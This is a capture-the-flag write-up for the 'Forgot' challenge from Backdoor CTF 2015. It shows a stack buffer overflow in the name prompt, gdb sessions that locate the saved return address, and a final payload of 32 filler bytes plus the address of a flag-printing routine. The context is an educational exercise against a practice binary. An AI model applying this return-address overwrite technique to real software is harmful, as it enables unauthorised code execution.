Backdoor CTF 2015!
05 Jun 2015We almost had the 500 point automation! Damn it!
Here is the write-up for the 200 point question ‘Forgot’.
Question:
Fawkes has been playing around with Finite State Automaton lately. While exploring the concept of implementing regular expressions using FSA he thought of implementing an email-address validator.
Recently, Lua started to annoy Fawkes. To this, Fawkes, challenged Lua to a battle of wits. Fawkes promised to reward Lua, only if she manages to transition to a non-reachable state in the FSA he implemented. Find the flag in the binary provided to you.
Solution:
Firstly, since I am providing an offline solution, let us emulate the game server by creating a file called flag in the same directory as the binary.
Let us run the file:
$:./forgot
What is your name?
> generic_name
Hi generic_name
Finite-State Automaton
I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address
Cheers!
I should give you a pointer perhaps. Here: 8048654
Enter the string to be validate
> this is a random string
This all you got? I dont even see an @!
Okay, this was weird. It first asks for our name and then asks us to enter a string which it wants to validate. Looking at the error thrown, it seems as if they are expecting an email address. After poking around with the validation string part, I found out that it indeed wants us to enter a valid email address.
But the vulnerability was not here. I tried overflowing the validation string input but went nowhere with it. Then I tried poking around with the earlier ‘name’ input.
$:./forgot
What is your name?
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Finite-State Automaton
I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address
Cheers!
I should give you a pointer perhaps. Here: 8048654
Enter the string to be validate
> Segmentation fault (core dumped)
Segmentation Fault! Yay! So we had done some buffer overflow here. I loaded up the binary in Hopper Disassembler and found this :
0x08048d9f ./flag
0x08048da6 cat %s
The program is calling ./flag and then performing cat %s or opening the flag file. Somehow if we jump to memory address 0x80486cc we can execute the chain of instructions which will help us in printing out then flag.
We see in Hopper that the program calls the main function just near the Entry-Point. This is really helpful for us if we can just overwrite the return address of the program to 0x80486cc, we are done.
Let us open the file in gdb.
I set some trivial break points. One, just before the program starts printing Hi! and one after taking the string as the input.
Here, just before the program has yet to print Hi! we have our stack filled with the saved return address and other registers.
(gdb) break *0x80485dd
Breakpoint 1 at 0x80485dd
(gdb) break *0x8048602
Breakpoint 2 at 0x8048602
Now let us start the program.
(gdb) start
Function "main" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Temporary breakpoint 3 (main) pending.
Starting program: /home/chinmay_dd/Desktop/Forgot/forgot
What is your name?
> generic_name
Breakpoint 1, 0x080485dd in ?? ()
Cool. Now let us analyze the stack.
(gdb) x/5w $ebp
0xffffccd8: U""
0xffffccdc: U"\xf7e1da83\001\xffffcd74\xffffcd7c\xf7feacea\001\xffffcd74\xffffcd14\x804b028\x80482b8\xf7fae000"
0xffffcd0c: U""
0xffffcd10: U""
0xffffcd14: U"\x709a3512\x4cb77102"
We can see the return address in $ebp+0x4. Let us set it to where we want and see what happens.
(gdb)set {int}0xffffccdc = 0x80486cc
After inputting the string for validation, we get:
this_is_where_the_flag_will_be (contents of the file flag)
So we overflow the stack and send in "A"*32+p(0x80486CC)+"\n", and get the flag!